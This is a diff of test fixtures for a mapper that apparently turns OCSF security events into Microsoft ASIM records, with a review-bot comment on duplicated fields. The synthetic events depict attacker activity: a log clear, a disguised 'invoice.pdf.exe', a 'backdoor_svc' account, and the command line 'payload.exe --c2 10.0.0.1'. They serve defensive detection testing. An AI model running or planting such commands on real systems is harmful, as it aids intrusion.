@@ -1,19 +1,87 @@ { - name: "asim.alert_event", + EventCount: 1, + EventStartTime: 2026-05-01T10:10:00Z, + EventEndTime: 2026-05-01T10:12:00Z, + EventProduct: "Microsoft Defender", + EventVendor: "Microsoft", + EventOriginalUid: "alert-1", + EventUid: "alert-1", + EventOriginalType: "200401", + EventSeverity: "High", + EventResult: "NA", + Dvc: "Microsoft Defender", EventSchema: "AlertEvent", EventSchemaVersion: "0.1", EventType: "Alert", - EventUid: "alert-1", - EventSeverity: "High", - EventOriginalUid: "alert-1", - EventProduct: "Microsoft Defender", - EventVendor: "Microsoft", AlertName: "Suspicious PowerShell", + EventReportUrl: null, EventSubType: "Threat", ThreatName: "Trojan", ThreatCategory: "Malware", ThreatOriginalCategory: "malware", + Username: null, + UserId: null, + UserIdType: null, AlertStatus: "Active", AlertOriginalStatus: "New", AlertVerdict: "True Positive", + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + attacks: [ + { + technique: { + uid: "T1059", + }, + }, + ], + category_uid: 2, + category_name: "Findings", + class_uid: 2004, + class_name: "Detection Finding", + type_uid: 200401, + type_name: "Detection Finding: Create", + time: 2026-05-01T10:10:00Z, + end_time: 2026-05-01T10:12:00Z, + severity_id: 4, + severity: "High", + status_id: 1, + status: "New", + verdict: "True Positive", + metadata: { + log_name: "security/alerts_v2", + original_event_uid: "alert-1", + product: { + name: "Microsoft Defender", + vendor_name: "Microsoft", + feature: { + name: "Microsoft Graph", + }, + }, + profiles: [ + "cloud", + "incident", + "security_control", + ], + tenant_uid: "11111111-1111-1111-1111-111111111111", + version: "1.8.0", + }, + cloud: { + provider: "Azure", + }, + finding_info: { + uid: "alert-1", + title: "Suspicious PowerShell", + desc: "PowerShell launched with suspicious arguments.", + types: [ + "malware", + ], + }, + malware: [ + { + name: "Trojan", + }, + ], + }, + name: "asim.alert_event", } 
diff --git a/microsoft/tests/ocsf-to-asim/audit.tql b/microsoft/tests/ocsf-to-asim/audit.tql
index 56aad19..af795f7 100644
--- a/microsoft/tests/ocsf-to-asim/audit.tql
+++ b/microsoft/tests/ocsf-to-asim/audit.tql
@@ -41,7 +41,3 @@ from {
 @name = "ocsf.event_log_activity"
 microsoft::asim::ocsf::map
 name = @name
-select name, EventSchema, EventSchemaVersion, EventType, EventResult,
- EventSeverity, EventOriginalType, Dvc, DvcHostname, Object, ObjectType,
- Operation, ActorUsername, ActorUsernameType, ActorUserId,
- ActorUserIdType
diff --git a/microsoft/tests/ocsf-to-asim/audit.txt b/microsoft/tests/ocsf-to-asim/audit.txt
index e9f470c..2e3fde0 100644
--- a/microsoft/tests/ocsf-to-asim/audit.txt
+++ b/microsoft/tests/ocsf-to-asim/audit.txt
@@ -1,18 +1,71 @@ { - name: "asim.audit_event", - EventSchema: "AuditEvent", - EventSchemaVersion: "0.1.2", - EventType: "Clear", - EventResult: "NA", - EventSeverity: "High", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, + EventProduct: "Microsoft-Windows-Eventlog", + EventVendor: "Microsoft", + EventOriginalUid: "99001", + EventUid: "99001", EventOriginalType: "1102", + EventSeverity: "High", + EventResult: "NA", Dvc: "WINHOST01.corp.local", DvcHostname: "WINHOST01.corp.local", + DvcFQDN: "WINHOST01.corp.local", + EventSchema: "AuditEvent", + EventSchemaVersion: "0.1.2", + EventType: "Clear", + Operation: "Clear", Object: "Security", ObjectType: "Event Log", - Operation: "Clear", ActorUsername: "CORP\\jdoe", ActorUsernameType: "Windows", ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", ActorUserIdType: "SID", + SrcIpAddr: null, + TargetHostname: null, + TargetIpAddr: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Clear", + category_uid: 1, + category_name: "System Activity", + class_uid: 1008, + class_name: "Event Log Activity", + type_uid: 100801, + type_name: "Event Log Activity: Clear", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 4, + severity: "High", + metadata: { + event_code: "1102", + log_name: "Security", + original_event_uid: "99001", + product: { + name: "Microsoft-Windows-Eventlog", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "WINHOST01.corp.local", + }, + actor: { + process: { + pid: 4660, + }, + session: { + uid_alt: "0xA1B2C3", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + }, + name: "asim.audit_event", } diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/ocsf-to-asim/authentication.tql index 91d38ad..056ddfc 100644 --- a/microsoft/tests/ocsf-to-asim/authentication.tql 
+++ b/microsoft/tests/ocsf-to-asim/authentication.tql
@@ -146,11 +146,3 @@ from {
 microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
-select name, EventSchema, EventSchemaVersion, EventType,
- EventSubType=EventSubType?, EventOriginalSubType=EventOriginalSubType?,
- EventResult, EventSeverity, EventProduct, EventVendor, EventOriginalType,
- EventOriginalUid, Dvc, DvcHostname=DvcHostname?,
- SrcIpAddr=SrcIpAddr?, SrcPortNumber=SrcPortNumber?,
- TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType,
- TargetAppName=TargetAppName?, TargetAppId=TargetAppId?,
- LogonProtocol=LogonProtocol?, LogonMethod=LogonMethod?
diff --git a/microsoft/tests/ocsf-to-asim/authentication.txt b/microsoft/tests/ocsf-to-asim/authentication.txt
index 7e37af7..49d599f 100644
--- a/microsoft/tests/ocsf-to-asim/authentication.txt
+++ b/microsoft/tests/ocsf-to-asim/authentication.txt
@@ -1,78 +1,266 @@ { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logon", - EventSubType: "Remote", - EventOriginalSubType: "Network", - EventResult: "Success", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, EventProduct: "Microsoft-Windows-Security-Auditing", EventVendor: "Microsoft", - EventOriginalType: "4624", EventOriginalUid: "98761", + EventUid: "98761", + EventOriginalType: "4624", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", - SrcIpAddr: 10.0.0.42, - SrcPortNumber: 49827, + DvcFQDN: "DC01.corp.local", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventSubType: "Remote", + EventOriginalSubType: "Network", + ActorUsername: "S-1-0-0", + ActorUserId: "S-1-0-0", + ActorUserIdType: "SID", + ActorSessionId: "0x0", TargetUsername: "CORP\\jdoe", TargetUsernameType: "Windows", + TargetDomain: "CORP", + TargetDomainType: "Windows", TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", TargetUserIdType: "SID", - TargetAppName: null, + TargetSessionId: null, + SrcIpAddr: 10.0.0.42, + SrcHostname: null, + SrcPortNumber: 49827, + TargetHostname: "DC01.corp.local", TargetAppId: null, + TargetAppName: null, LogonProtocol: "Kerberos", - LogonMethod: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Logon", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300201, + type_name: "Authentication: Logon", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + auth_protocol: "Kerberos", + logon_type: "Network", + logon_type_id: 3, + metadata: { + event_code: "4624", + original_event_uid: "98761", + product: { + name: 
"Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + src_endpoint: { + ip: 10.0.0.42, + port: 49827, + }, + actor: { + user: { + uid: "S-1-0-0", + }, + session: { + uid_alt: "0x0", + }, + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + name: "asim.authentication", } { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logoff", - EventSubType: null, - EventOriginalSubType: null, - EventResult: "Success", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2024-03-23T12:45:00Z, + EventEndTime: 2024-03-23T12:45:00Z, EventProduct: "Microsoft-Windows-Security-Auditing", EventVendor: "Microsoft", - EventOriginalType: "4634", EventOriginalUid: "98762", + EventUid: "98762", + EventOriginalType: "4634", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", - SrcIpAddr: null, - SrcPortNumber: null, + DvcFQDN: "DC01.corp.local", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logoff", + ActorUsername: null, + ActorUserId: null, + ActorUserIdType: null, + ActorSessionId: null, TargetUsername: "CORP\\jdoe", TargetUsernameType: "Windows", + TargetDomain: "CORP", + TargetDomainType: "Windows", TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", TargetUserIdType: "SID", - TargetAppName: null, + TargetSessionId: null, + SrcIpAddr: null, + SrcHostname: null, + SrcPortNumber: null, + TargetHostname: "DC01.corp.local", TargetAppId: null, + TargetAppName: null, LogonProtocol: null, - LogonMethod: null, + AdditionalFields: { + activity_id: 2, + activity_name: "Logoff", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300202, + type_name: 
"Authentication: Logoff", + time: 2024-03-23T12:45:00Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + event_code: "4634", + original_event_uid: "98762", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + name: "asim.authentication", } { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logon", - EventSubType: null, - EventOriginalSubType: null, - EventResult: "Success", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2026-05-01T10:00:00Z, + EventEndTime: 2026-05-01T10:00:00Z, EventProduct: "Microsoft Entra ID", EventVendor: "Microsoft", - EventOriginalType: "300201", EventOriginalUid: "sign-in-1", + EventUid: "sign-in-1", + EventOriginalType: "300201", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "Microsoft Entra ID", - DvcHostname: null, - SrcIpAddr: 203.0.113.10, - SrcPortNumber: null, + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + ActorUsername: "example.com\\alice", + ActorUsernameType: "Windows", + ActorUserId: "user-1", + ActorUserIdType: null, + ActorSessionId: null, TargetUsername: "example.com\\alice", TargetUsernameType: "Windows", + TargetDomain: "example.com", + TargetDomainType: "Windows", TargetUserId: "user-1", TargetUserIdType: null, - TargetAppName: "Office 365", + TargetSessionId: null, + SrcIpAddr: 203.0.113.10, + SrcHostname: null, + SrcPortNumber: null, + TargetHostname: null, TargetAppId: "app-1", + TargetAppName: "Office 365", LogonProtocol: null, LogonMethod: "Push Notification", + AdditionalFields: { + activity_id: 1, + activity_name: "Logon", + category_uid: 3, + category_name: "Identity & Access 
Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300201, + type_name: "Authentication: Logon", + time: 2026-05-01T10:00:00Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + log_name: "auditLogs/signIns", + original_event_uid: "sign-in-1", + product: { + name: "Microsoft Entra ID", + vendor_name: "Microsoft", + feature: { + name: "Microsoft Graph", + }, + }, + profiles: [ + "cloud", + "security_control", + ], + version: "1.8.0", + }, + cloud: { + provider: "Azure", + }, + actor: { + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + uid: "user-1", + }, + }, + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + uid: "user-1", + }, + src_endpoint: { + ip: 203.0.113.10, + uid: "device-1", + }, + dst_endpoint: { + svc_name: "Microsoft Graph", + uid: "resource-1", + }, + service: { + name: "Office 365", + uid: "app-1", + }, + auth_factors: [ + { + factor_type: "Push Notification", + factor_type_id: 5, + }, + ], + }, + name: "asim.authentication", } diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/ocsf-to-asim/direct-targets.tql index 6d4e3b4..aaecf95 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.tql +++ b/microsoft/tests/ocsf-to-asim/direct-targets.tql 
@@ -185,14 +185,3 @@ from {
 microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
-select name, EventSchema, EventSchemaVersion, EventType, EventResult,
- EventSeverity, EventOriginalUid, Dvc, ActorUsername=ActorUsername?,
- TargetFilePath=TargetFilePath?, TargetFilePathType=TargetFilePathType?,
- TargetFileName=TargetFileName?, SrcFilePath=SrcFilePath?,
- SrcFileName=SrcFileName?, SrcIpAddr=SrcIpAddr?,
- SrcPortNumber=SrcPortNumber?, DstIpAddr=DstIpAddr?,
- DstPortNumber=DstPortNumber?, SrcBytes=SrcBytes?, DstBytes=DstBytes?,
- DnsQuery=DnsQuery?, DnsQueryTypeName=DnsQueryTypeName?,
- DnsQueryClassName=DnsQueryClassName?,
- EventResultDetails=EventResultDetails?, SrcHostname=SrcHostname?,
- SrcMacAddr=SrcMacAddr?, Url=Url?, HttpRequestMethod=HttpRequestMethod?
diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.txt b/microsoft/tests/ocsf-to-asim/direct-targets.txt
index 89b0c39..0b7405c 100644
--- a/microsoft/tests/ocsf-to-asim/direct-targets.txt
+++ b/microsoft/tests/ocsf-to-asim/direct-targets.txt
@@ -1,180 +1,339 @@ { - name: "asim.dhcp_event", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:03Z, + EventEndTime: 2026-01-01T00:00:03Z, + EventProduct: "DHCP", + EventVendor: "Microsoft", + EventOriginalUid: "dhcp-1", + EventUid: "dhcp-1", + EventOriginalType: "400405", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "dhcp1", + DvcHostname: "dhcp1", + DvcFQDN: "dhcp1", EventSchema: "DhcpEvent", EventSchemaVersion: "0.1.1", EventType: "Assign", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "dhcp-1", - Dvc: "dhcp1", - ActorUsername: null, - TargetFilePath: null, - TargetFilePathType: null, - TargetFileName: null, - SrcFilePath: null, - SrcFileName: null, - SrcIpAddr: 10.0.0.50, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: null, SrcHostname: "client1", + SrcIpAddr: 10.0.0.50, SrcMacAddr: "00:11:22:33:44:55", - Url: null, - HttpRequestMethod: null, + AdditionalFields: { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, + }, + name: "asim.dhcp_event", } { - name: "asim.dns", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:02Z, + EventEndTime: 2026-01-01T00:00:02Z, + EventProduct: "DNS", + EventVendor: "Microsoft", + EventOriginalUid: "dns-1", + EventUid: "dns-1", + EventOriginalType: "400301", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "dns1", + DvcHostname: "dns1", + DvcFQDN: "dns1", EventSchema: "Dns", EventSchemaVersion: "0.1.7", 
EventType: "Query", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "dns-1", - Dvc: "dns1", - ActorUsername: null, - TargetFilePath: null, - TargetFilePathType: null, - TargetFileName: null, - SrcFilePath: null, - SrcFileName: null, - SrcIpAddr: 10.0.0.1, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, + EventSubType: "request", DnsQuery: "example.org", DnsQueryTypeName: "A", DnsQueryClassName: "IN", EventResultDetails: "NA", + SrcIpAddr: 10.0.0.1, SrcHostname: null, - SrcMacAddr: null, - Url: null, - HttpRequestMethod: null, + DstIpAddr: null, + DstHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, + }, + name: "asim.dns", } { - name: "asim.file_event", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:00Z, + EventEndTime: 2026-01-01T00:00:00Z, + EventProduct: "Endpoint", + EventVendor: "Microsoft", + EventOriginalUid: "file-1", + EventUid: "file-1", + EventOriginalType: "100101", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "host1", + DvcHostname: "host1", + DvcFQDN: "host1", EventSchema: "FileEvent", EventSchemaVersion: "0.2.2", EventType: "FileCreated", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "file-1", - Dvc: "host1", ActorUsername: "alice", + ActorUserId: null, TargetFilePath: "C:\\tmp\\payload.exe", - TargetFilePathType: "Windows Local", TargetFileName: "payload.exe", - SrcFilePath: null, - SrcFileName: null, - SrcIpAddr: null, - 
SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: null, - SrcHostname: null, - SrcMacAddr: null, - Url: null, - HttpRequestMethod: null, + TargetFilePathType: "Windows Local", + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + }, + name: "asim.file_event", } { - name: "asim.file_event", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:05Z, + EventEndTime: 2026-01-01T00:00:05Z, + EventProduct: "Endpoint", + EventVendor: "Microsoft", + EventOriginalUid: "file-2", + EventUid: "file-2", + EventOriginalType: "100105", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "host1", + DvcHostname: "host1", + DvcFQDN: "host1", EventSchema: "FileEvent", EventSchemaVersion: "0.2.2", EventType: "FileRenamed", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "file-2", - Dvc: "host1", ActorUsername: "alice", + ActorUserId: null, TargetFilePath: "C:\\tmp\\invoice.pdf.exe", - TargetFilePathType: "Windows Local", TargetFileName: "invoice.pdf.exe", SrcFilePath: "C:\\tmp\\payload.exe", SrcFileName: "payload.exe", - SrcIpAddr: null, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: null, - SrcHostname: null, - SrcMacAddr: null, - Url: null, - HttpRequestMethod: null, + SrcFilePathType: 
"Windows Local", + TargetFilePathType: "Windows Local", + AdditionalFields: { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, + }, + name: "asim.file_event", } { - name: "asim.network_session", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:01Z, + EventEndTime: 2026-01-01T00:00:01Z, + EventProduct: "Firewall", + EventVendor: "Microsoft", + EventOriginalUid: "net-1", + EventUid: "net-1", + EventOriginalType: "400106", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "fw1", + DvcHostname: "fw1", + DvcFQDN: "fw1", EventSchema: "NetworkSession", EventSchemaVersion: "0.2.7", EventType: "Flow", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "net-1", - Dvc: "fw1", - ActorUsername: null, - TargetFilePath: null, - TargetFilePathType: null, - TargetFileName: null, - SrcFilePath: null, - SrcFileName: null, SrcIpAddr: 10.0.0.1, + SrcHostname: null, SrcPortNumber: 12345, DstIpAddr: 10.0.0.2, + DstHostname: null, DstPortNumber: 443, SrcBytes: 100, DstBytes: 200, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: null, - SrcHostname: null, - SrcMacAddr: null, - Url: null, - HttpRequestMethod: null, + AdditionalFields: { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + 
original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, + }, + name: "asim.network_session", } { - name: "asim.web_session", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:04Z, + EventEndTime: 2026-01-01T00:00:04Z, + EventProduct: "Proxy", + EventVendor: "Microsoft", + EventOriginalUid: "web-1", + EventUid: "web-1", + EventOriginalType: "400203", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "proxy1", + DvcHostname: "proxy1", + DvcFQDN: "proxy1", EventSchema: "WebSession", EventSchemaVersion: "0.2.7", EventType: "HTTPsession", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "web-1", - Dvc: "proxy1", - ActorUsername: null, - TargetFilePath: null, - TargetFilePathType: null, - TargetFileName: null, - SrcFilePath: null, - SrcFileName: null, - SrcIpAddr: null, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: "200", - SrcHostname: null, - SrcMacAddr: null, Url: "https://example.org/index.html", HttpRequestMethod: "GET", + EventResultDetails: "200", + AdditionalFields: { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, + }, + name: "asim.web_session", } 
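Review bot: The new baselines show `AdditionalFields` holding the entire source OCSF event, including fields the mapper already lifted into ASIM columns (`src_endpoint.ip` beside `SrcIpAddr`, `file.path` beside `TargetFilePath`, `http_request.url.url_string` beside `Url`), so every record carries its payload twice; the `process.txt` and `user-management.txt` hunks show the same (`process.cmd_line` beside `TargetProcessCommandLine`). This inflates record size and means any masking or retention rule applied to an ASIM column must also cover its copy inside `AdditionalFields`. If keeping the full event there is the intended convention, it is worth stating in the mapper's documentation; otherwise consider pruning already-mapped fields from `AdditionalFields`. The mapper itself is outside these hunks, so this is inferred from the expected output only.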
diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/ocsf-to-asim/process.tql
index caa54b3..0758530 100644
--- a/microsoft/tests/ocsf-to-asim/process.tql
+++ b/microsoft/tests/ocsf-to-asim/process.tql
@@ -57,8 +57,3 @@ from {
 @name = "ocsf.process_activity"
 microsoft::asim::ocsf::map
 name = @name
-select name, EventSchema, EventSchemaVersion, EventType, EventResult,
- EventSeverity, EventOriginalType, DvcHostname, ActorUsername,
- ActorUsernameType, ActorUserId, ActorUserIdType, ActingProcessId,
- ParentProcessId, TargetProcessId, TargetProcessName,
- TargetProcessCommandLine
diff --git a/microsoft/tests/ocsf-to-asim/process.txt b/microsoft/tests/ocsf-to-asim/process.txt
index ffe7db0..392d9ef 100644
--- a/microsoft/tests/ocsf-to-asim/process.txt
+++ b/microsoft/tests/ocsf-to-asim/process.txt
@@ -1,12 +1,20 @@
 {
- name: "asim.process_event",
+ EventCount: 1,
+ EventStartTime: 2024-03-23T12:34:56.789012300Z,
+ EventEndTime: 2024-03-23T12:34:56.789012300Z,
+ EventProduct: "Microsoft-Windows-Security-Auditing",
+ EventVendor: "Microsoft",
+ EventOriginalUid: "98764",
+ EventUid: "98764",
+ EventOriginalType: "4688",
+ EventSeverity: "Informational",
+ EventResult: "Success",
+ Dvc: "WINHOST01.corp.local",
+ DvcHostname: "WINHOST01.corp.local",
+ DvcFQDN: "WINHOST01.corp.local",
 EventSchema: "ProcessEvent",
 EventSchemaVersion: "0.1.4",
 EventType: "ProcessCreated",
- EventResult: "Success",
- EventSeverity: "Informational",
- EventOriginalType: "4688",
- DvcHostname: "WINHOST01.corp.local",
 ActorUsername: "CORP\\jdoe",
 ActorUsernameType: "Windows",
 ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104",
@@ -16,4 +24,64 @@ TargetProcessId: "6732", TargetProcessName: "payload.exe", TargetProcessCommandLine: "payload.exe --c2 10.0.0.1", + TargetUserId: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Launch", + category_uid: 1, + category_name: "System Activity", + class_uid: 1007, + class_name: "Process Activity", + type_uid: 100701, + type_name: "Process Activity: Launch", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + event_code: "4688", + original_event_uid: "98764", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "WINHOST01.corp.local", + }, + actor: { + process: { + pid: 4660, + name: "wscript.exe", + parent_process: { + pid: 520, + name: "explorer.exe", + }, + }, + session: { + uid_alt: "0xA1B2C3", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + process: { + pid: 6732, + name: "payload.exe", + path: "C:\\tmp\\payload.exe", + cmd_line: "payload.exe --c2 10.0.0.1", + parent_process: { + pid: 4660, + name: "wscript.exe", + }, + }, + }, + name: "asim.process_event", } diff --git a/microsoft/tests/ocsf-to-asim/user-management.tql b/microsoft/tests/ocsf-to-asim/user-management.tql index 037eb44..02832f6 100644 --- a/microsoft/tests/ocsf-to-asim/user-management.tql +++ b/microsoft/tests/ocsf-to-asim/user-management.tql @@ -79,8 +79,3 @@ from { microsoft::asim::ocsf::map name = @name sort EventOriginalType -select name, EventSchema, EventSchemaVersion, EventType, EventResult, - EventSeverity, EventOriginalType, DvcHostname, ActorUsername, - ActorUsernameType, TargetUsername, TargetUsernameType=TargetUsernameType?, - TargetUserId, TargetUserIdType, GroupName=GroupName?, GroupId=GroupId?, - GroupIdType=GroupIdType? 
diff --git a/microsoft/tests/ocsf-to-asim/user-management.txt b/microsoft/tests/ocsf-to-asim/user-management.txt index 23d95e0..01f6ae5 100644 --- a/microsoft/tests/ocsf-to-asim/user-management.txt +++ b/microsoft/tests/ocsf-to-asim/user-management.txt @@ -1,14 +1,24 @@ { - name: "asim.user_management", - EventSchema: "UserManagement", - EventSchemaVersion: "0.1.2", - EventType: "UserCreated", - EventResult: "NA", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalUid: "98767", + EventUid: "98767", EventOriginalType: "4720", + EventSeverity: "Informational", + EventResult: "NA", + Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", + DvcFQDN: "DC01.corp.local", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", ActorUsername: "CORP\\jdoe", ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", + EventType: "UserCreated", TargetUsername: "CORP\\backdoor_svc", TargetUsernameType: "Windows", TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", 
